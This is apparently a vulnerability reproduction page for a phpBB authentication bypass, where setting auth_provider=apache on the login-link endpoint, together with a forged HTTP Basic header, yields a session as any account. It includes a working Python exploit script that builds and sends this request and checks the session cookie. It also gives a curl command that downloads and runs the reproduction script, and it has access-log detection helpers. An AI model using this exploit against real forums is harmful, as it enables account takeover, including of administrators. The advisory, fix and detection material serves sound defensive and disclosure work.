Verified phpBB authentication bypass/account hijacking via OAuth login-link flow with arbitrary auth_provider=apache
REPRO-2026-00223 phpbb/phpbb · github Auth Bypass Jul 4, 2026 .txt
Severity CRITICAL
Confidence HIGH
Reproduced in 22m 9s
Tool calls 214
Spend $4.83
Affected phpBB 3.3.0 through 3.3.16 and 4.0.0-a2 (default configuration, auth_method=db)
Fixed in phpBB 3.3.17 released 2026-06-06
$ pruva-verify REPRO-2026-00223
or curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00223/artifacts/bundle/repro/reproduction_steps.sh && chmod +x reproduction_steps.sh && ./reproduction_steps.sh
Run in a VM or disposable container. This exploits a real vulnerability.
02 · The vulnerability

Authentication bypass in phpBB's UCP login-link flow. ucp.php?mode=login_link loads includes/ucp/ucp_login_link.php, which reads an attacker-controlled auth_provider query/POST parameter and calls $provider_collection->get_provider($request->variable('auth_provider', '')) with it, so the request rather than the board's auth_method setting decides which provider handles the login. Setting auth_provider=apache routes the submitted credentials to the apache provider's login() method (phpbb/auth/provider/apache.php). That provider is built to trust authentication already performed by the web server: it reads PHP_AUTH_USER from the request's HTTP Basic Authorization header, checks only that it equals the submitted username (and that the submitted password and PHP_AUTH_PW are non-empty), looks the username up in the users table, and returns LOGIN_SUCCESS with the user row. Neither password is ever compared against the stored hash. The login-link code then calls session_create() for that user, so an unauthenticated attacker who controls the Basic Authorization header obtains a valid session as any existing account, including administrators. Default auth_method=db installations are vulnerable out of the box; no OAuth provider needs to be configured. The only deployment prerequisite is that PHP exposes the Basic credentials as PHP_AUTH_USER, which mod_php does by default (FastCGI/FPM deployments depend on the Authorization header being forwarded to PHP).
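
As an added example (not code from the Pruva bundle or from phpBB), the following Python script builds the single request described above, classifies the response by the session cookie phpBB sets, and flags the same request shape in web server access logs. The page gives the ucp.php?mode=login_link&auth_provider=apache entry point and the Basic-auth/username/password mechanics but not the complete form field list, so the field names marked as assumptions in the comments should be compared against bundle/repro/reproduction_steps.sh before relying on the probe. It also assumes PHP exposes the Basic credentials as PHP_AUTH_USER, which mod_php does by default. The access-log lines are constructed sample data. Only run probe() against a board you are authorized to test.

```python
"""Probe and detection helpers for the phpBB login_link / auth_provider=apache bypass.

Added example for this page; not code from the Pruva bundle or from phpBB.
Anything marked "assumption" is not stated on the page.
"""
import base64
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie

# phpBB's ANONYMOUS user_id. session_create() writes it into the <cookie_name>_u cookie
# for guest sessions and writes the real user_id there once a login succeeds.
ANONYMOUS_USER_ID = "1"


def build_probe(base_url, username, password="never-checked"):
    """Return (url, headers, body) for one login-link POST that selects the apache provider.

    The password only has to be non-empty: apache.php rejects an empty password and an
    empty PHP_AUTH_PW but never compares either with the stored hash.
    """
    url = base_url.rstrip("/") + "/ucp.php?" + urllib.parse.urlencode(
        {"mode": "login_link", "auth_provider": "apache"}
    )
    # Under mod_php the Basic credentials surface as $_SERVER['PHP_AUTH_USER'] / PHP_AUTH_PW,
    # which is all the apache provider looks at.
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = {
        "Authorization": "Basic " + token,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    body = urllib.parse.urlencode({
        "login": "Login",
        "login_username": username,  # must equal PHP_AUTH_USER or login() returns LOGIN_ERROR_USERNAME
        "login_password": password,
        # Assumption: the login-link page expects at least one login_link_* field naming the
        # external account to link; the apache provider's link_account() does nothing with it.
        "login_link_oauth_service": "probe",
    }).encode()
    return url, headers, body


def classify_set_cookies(set_cookie_values):
    """Return "vulnerable" if any Set-Cookie header carries a non-anonymous <prefix>_u value.

    The cookie prefix is per installation (config cookie_name), so only the _u suffix is matched.
    """
    for raw in set_cookie_values:
        jar = SimpleCookie()
        try:
            jar.load(raw)
        except Exception:  # skip cookies the stdlib parser cannot read
            continue
        for name, morsel in jar.items():
            if name.endswith("_u") and morsel.value not in ("", ANONYMOUS_USER_ID):
                return "vulnerable"
    return "not-vulnerable"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand back the 3xx response itself; the session cookies ride on the redirect after session_create()."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, username, timeout=10):
    """Send one probe and classify the response. Needs network access to a board you may test."""
    url, headers, body = build_probe(base_url, username)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(req, timeout=timeout)
    except urllib.error.HTTPError as err:
        resp = err  # 3xx/4xx land here but still carry the headers we need
    cookies = resp.headers.get_all("Set-Cookie") or []
    return classify_set_cookies(cookies), resp.getcode(), cookies


# Detection side over combined-format access log lines (constructed sample data). POST bodies
# are not logged, so a request that sends auth_provider in the form body instead of the query
# string leaves no trace here.
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [04/Jul/2026:10:01:02 +0000] "POST /ucp.php?mode=login_link&auth_provider=apache HTTP/1.1" 302 0 "-" "curl/8.6.0"',
    '198.51.100.4 - - [04/Jul/2026:10:01:05 +0000] "GET /ucp.php?mode=login HTTP/1.1" 200 15231 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Jul/2026:10:02:11 +0000] "GET /ucp.php?mode=login_link&login_link_oauth_service=google HTTP/1.1" 200 15402 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Jul/2026:10:03:40 +0000] "POST /forum/ucp.php?mode=login_link&auth_provider=apache&sid=0123abcd HTTP/2.0" 302 0 "-" "python-requests/2.32"',
]


def flag_access_log(lines, provider="apache"):
    """Return the log lines that hit ucp.php?mode=login_link with auth_provider=<provider>."""
    hits = []
    for line in lines:
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/ucp.php"):
            continue
        params = urllib.parse.parse_qs(query)
        if params.get("mode") == ["login_link"] and params.get("auth_provider") == [provider]:
            hits.append(line)
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # python3 probe.py https://board.example admin
        print(*probe(sys.argv[1], sys.argv[2]))
    else:
        for hit in flag_access_log(SAMPLE_ACCESS_LOG):
            print("suspicious:", hit)
```

The opener refuses to follow redirects on purpose: when the login-link handler redirects after session_create(), the <prefix>_u cookie carrying the victim's user_id is on that 3xx response and a redirect-following client would only see the landing page. On a fixed board the same request should leave _u at 1 (or not set it at all), which is what classify_set_cookies() reports as not-vulnerable. The log check only sees the query string, so pair it with application-side logging or a periodic probe rather than treating an empty result as proof of no attempts.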

03 · Root cause
Variant analysis
04 · Reproduction transcript

The agent's step-by-step process — every tool call, every handoff, the moment the exploit fired. Phases: support triages the advisory · repro reproduces it · vuln_variant confirms the fix blocks it · judge verifies.


05 · Artifacts

Scripts, logs, diffs, and output captured during the reproduction.

bundle/ticket.md  1.1 KB
bundle/ticket.json  2.2 KB
bundle/AGENTS.repro.md  0.5 KB
bundle/docker/Dockerfile  2.3 KB
bundle/docker/apache-site.conf  0.3 KB
bundle/docker/install-config.yml  0.7 KB
bundle/repro/artifacts/vuln/exploit_response.txt  0.8 KB
bundle/repro/artifacts/vuln/cookies.txt  0.3 KB
bundle/repro/artifacts/vuln/index_with_session.html  15.4 KB
bundle/repro/artifacts/fixed/exploit_ucp_response.txt  1.4 KB
bundle/repro/artifacts/fixed/cookies_ucp.txt  0.3 KB
bundle/repro/artifacts/fixed/exploit_ctrl_response.txt  11.6 KB
bundle/repro/artifacts/fixed/cookies_ctrl.txt  0.3 KB
bundle/repro/runtime_manifest.json  1.0 KB
bundle/repro/validation_verdict.json  1.0 KB
bundle/logs/reproduction_steps.log  2.5 KB
bundle/logs/vuln_exploit_response.txt  0.8 KB
bundle/logs/fixed_exploit_ctrl_response.txt  11.6 KB
bundle/logs/vuln_setcookie_summary.txt  0.2 KB
bundle/logs/fixed_setcookie_summary.txt  0.2 KB
bundle/logs/vuln_variant.log  4.3 KB
bundle/logs/vv_vuln_v5_resp.txt  0.8 KB
bundle/logs/vv_fixed_v5ctrl_resp.txt  11.6 KB
bundle/logs/vv_fixed_v1_register_resp.txt  12.1 KB
bundle/logs/vv_fixed_v3_resp.txt  11.7 KB
bundle/logs/vv_fixed_v4_resp.txt  9.7 KB
bundle/vuln_variant/artifacts/vuln/v5_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/vuln/v5_cookies.txt.resp.txt  0.8 KB
bundle/vuln_variant/artifacts/vuln/v5_index.html  15.5 KB
bundle/vuln_variant/artifacts/vuln/v1_form_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/vuln/v1_form_cookies.txt.resp.txt  0.5 KB
bundle/vuln_variant/artifacts/vuln/v1_submit_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/vuln/v1_submit_cookies.txt.resp.txt  12.1 KB
bundle/vuln_variant/artifacts/fixed/v5_ucp_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v5_ucp_cookies.txt.resp.txt  1.4 KB
bundle/vuln_variant/artifacts/fixed/v5_ctrl_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v5_ctrl_cookies.txt.resp.txt  11.6 KB
bundle/vuln_variant/artifacts/fixed/v1_form_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v1_form_cookies.txt.resp.txt  0.5 KB
bundle/vuln_variant/artifacts/fixed/v1_submit_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v1_submit_cookies.txt.resp.txt  12.1 KB
bundle/vuln_variant/artifacts/fixed/v2_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v2_cookies.txt.resp.txt  1.4 KB
bundle/vuln_variant/artifacts/fixed/v3_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v3_cookies.txt.resp.txt  11.7 KB
bundle/vuln_variant/artifacts/fixed/v4_cookies.txt  0.3 KB
bundle/vuln_variant/artifacts/fixed/v4_cookies.txt.resp.txt  9.7 KB
bundle/vuln_variant/artifacts/.resp.tmp  9.7 KB
bundle/vuln_variant/runtime_manifest.json  0.9 KB
bundle/vuln_variant/patch_analysis.md  11.3 KB
bundle/vuln_variant/variant_manifest.json  5.5 KB
bundle/vuln_variant/validation_verdict.json  5.0 KB
bundle/vuln_variant/source_identity.json  1.9 KB
bundle/vuln_variant/root_cause_equivalence.json  3.0 KB
bundle/logs/verify_fix.log  1.2 KB
bundle/logs/verify_build_patched.log  13.2 KB
bundle/coding/verify_artifacts/testA_response.txt  11.6 KB
bundle/coding/verify_artifacts/testA_cookies.txt  0.3 KB
bundle/coding/verify_artifacts/testB_response.txt  0.8 KB
bundle/coding/verify_artifacts/testB_cookies.txt  0.3 KB
bundle/coding/verify_artifacts/testB_index_with_session.html  15.5 KB
bundle/coding/verify_artifacts/control_response.txt  0.8 KB
bundle/coding/verify_artifacts/control_cookies.txt  0.3 KB
bundle/coding/verify_result.json  0.7 KB
bundle/repro/reproduction_steps.sh  15.0 KB
bundle/repro/rca_report.md  12.1 KB
bundle/vuln_variant/reproduction_steps.sh  16.9 KB
bundle/vuln_variant/rca_report.md  15.3 KB
bundle/coding/proposed_fix.diff  1.8 KB
bundle/coding/verify_fix.sh  13.2 KB
bundle/coding/summary_report.md  12.8 KB